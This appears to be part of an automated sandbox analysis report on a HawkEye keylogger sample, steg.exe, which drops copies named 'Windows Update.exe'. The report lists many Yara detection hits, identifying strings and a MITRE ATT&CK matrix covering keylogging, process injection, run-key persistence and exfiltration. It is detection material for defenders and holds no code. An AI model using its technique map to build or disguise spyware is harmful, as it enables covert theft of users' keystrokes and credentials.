                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.1.Windows Update.exe.1b377.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.1.Windows Update.exe.1b377.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Yara detected HawkEye Keylogger
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.b4d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.302645603.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                                Detected HawkEye Rat
                                Source: steg.exeString found in binary or memory: HawkEye_Keylogger_Recoveries_
                                Source: steg.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                                Source: steg.exeString found in binary or memory: HawkEyeKeylogger
                                Source: steg.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: steg.exe, 00000000.00000002.283184355.00000000036D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Recoveries_
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exeString found in binary or memory: HawkEyeKeylogger
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger|9
                                Source: Windows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exe, 00000004.00000002.302645603.0000000002B8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                                Source: Windows Update.exe, 00000004.00000002.301900537.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Recoveries_
                                Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                                Source: WindowsUpdate.exeString found in binary or memory: HawkEyeKeylogger
                                Source: WindowsUpdate.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: WindowsUpdate.exe, 0000000C.00000002.333848702.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Recoveries_
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exeString found in binary or memory: HawkEyeKeylogger
                                Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                                Source: Windows Update.exe, 0000000E.00000002.359319845.00000000033DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger|9
                                Source: Windows Update.exe, 0000000E.00000002.359319845.00000000033DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exe, 0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                                Source: Windows Update.exe, 0000000E.00000002.359194697.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                                Source: steg.exeString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: steg.exeString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: steg.exeString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: steg.exeString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: WindowsUpdate.exe.4.drString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: WindowsUpdate.exe.4.drString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: WindowsUpdate.exe.4.drString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: WindowsUpdate.exe.4.drString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                                Source: Windows Update.exe.0.drString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                                Source: Windows Update.exe.0.drString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                                Source: Windows Update.exe.0.drString found in binary or memory: ;HawkEye_Keylogger_Recoveries_CHawkEye Keylogger | Recoveries |
                                Source: Windows Update.exe.0.drString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Replication Through Removable Media                                		21
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Disable or Modify Tools                                		211
                                Input Capture                                		1
                                Peripheral Device Discovery                                		1
                                Replication Through Removable Media                                		11
                                Archive Collected Data                                		Exfiltration Over Other Network Medium4
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts2
                                Native API                                		1
                                Registry Run Keys / Startup Folder                                		1
                                Access Token Manipulation                                		11
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                File and Directory Discovery                                		Remote Desktop Protocol211
                                Input Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain AccountsAt (Linux)Logon Script (Windows)12
                                Process Injection                                		31
                                Obfuscated Files or Information                                		Security Account Manager23
                                System Information Discovery                                		SMB/Windows Admin Shares1
                                Clipboard Data                                		Automated Exfiltration1
                                Non-Standard Port                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)1
                                Registry Run Keys / Startup Folder                                		11
                                Software Packing                                		NTDS141
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureScheduled Transfer1
